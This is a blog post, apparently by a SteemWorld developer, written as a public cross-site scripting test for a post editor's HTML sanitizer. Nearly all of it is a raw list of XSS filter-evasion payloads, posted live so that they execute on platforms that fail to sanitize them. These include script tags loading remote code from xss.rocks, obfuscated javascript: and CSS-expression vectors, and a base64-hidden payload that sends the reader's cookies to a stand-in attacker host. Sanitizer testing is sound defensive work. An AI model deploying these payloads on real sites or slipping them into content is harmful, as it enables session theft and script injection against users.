This post acts as a public XSS Security Test for my upcoming Post Editor on SteemWorld. Of course, it can be used to test against many different XSS attacks on other platforms as well. If you should see a message stating 'XSS', the Steem platform you are using may not be secure and the developers need to be contacted immediately.
Since I recently finished the Sanitizer Module of my HTML Parser for the Editor, it's now time to test different scripting attacks and I think it is a good idea to have a post to be able to easily test any coming changes in future. A few things might still be added in the next few days.
I've spent some time checking the official XSS Filter Evasion Cheat Sheet (last revision: 02/23/2019) and included the relevant attacks in this post.
<SCRIPT SRC=http://xss.rocks/xss.js>
javascript:/*--><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
javascript:/*--><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")>
<IMG """>alert("XSS")">
<IMG """>alert("XSS")">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))">img>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))">
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert(
'XSS')>
<IMG SRC=javascript:alert(
'XSS')>
<IMG SRC=javascript:a&
#0000108ert('XSS')>
<IMG SRC=javascript:a&
#0000108ert('XSS')>
<IMG SRC=javascript:alert('XSS')>
![]()
<IMG SRC="jav ascript:alert('XSS');">
![]()
<IMG SRC="jav ascript:alert('XSS');">
![]()
<IMG SRC="jav
ascript:alert('XSS');">
![]()
<IMG SRC="jav
ascript:alert('XSS');">
![]()
<IMG SRC=" javascript:alert('XSS');">
![]()
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/XSS SRC="http://xss.rocks/xss.js">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/SRC="http://xss.rocks/xss.js">
<<SCRIPT>alert("XSS");//<
<alert("XSS");//<
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
<SCRIPT SRC=//xss.rocks/.j>
<IMG SRC="javascript:alert('XSS')"
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://xss.rocks/scriptlet.html <
</TITLE>alert("XSS");</SCRIPT>
alert("XSS");
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
![]()
<IMG LOWSRC="javascript:alert('XSS')">
![]()
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>
XSSbr>
XSS
<IMG SRC='vbscript:msgbox("XSS")'>
![]()
<IMG SRC="livescript:[code]">
![]()
<svg/onload=alert('XSS')>
<svg/onload=alert('XSS')>
<BODY ONLOAD=alert('XSS')>
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
![]()
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE>A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD>TABLE>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>
<DIV STYLE="width: expression(alert('XSS'));"></DIV>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B>I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
![]()
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
![]()
If you are a developer and you should need help in protecting your app against such attacks, feel free to leave me a message ;)
Just to be safe,
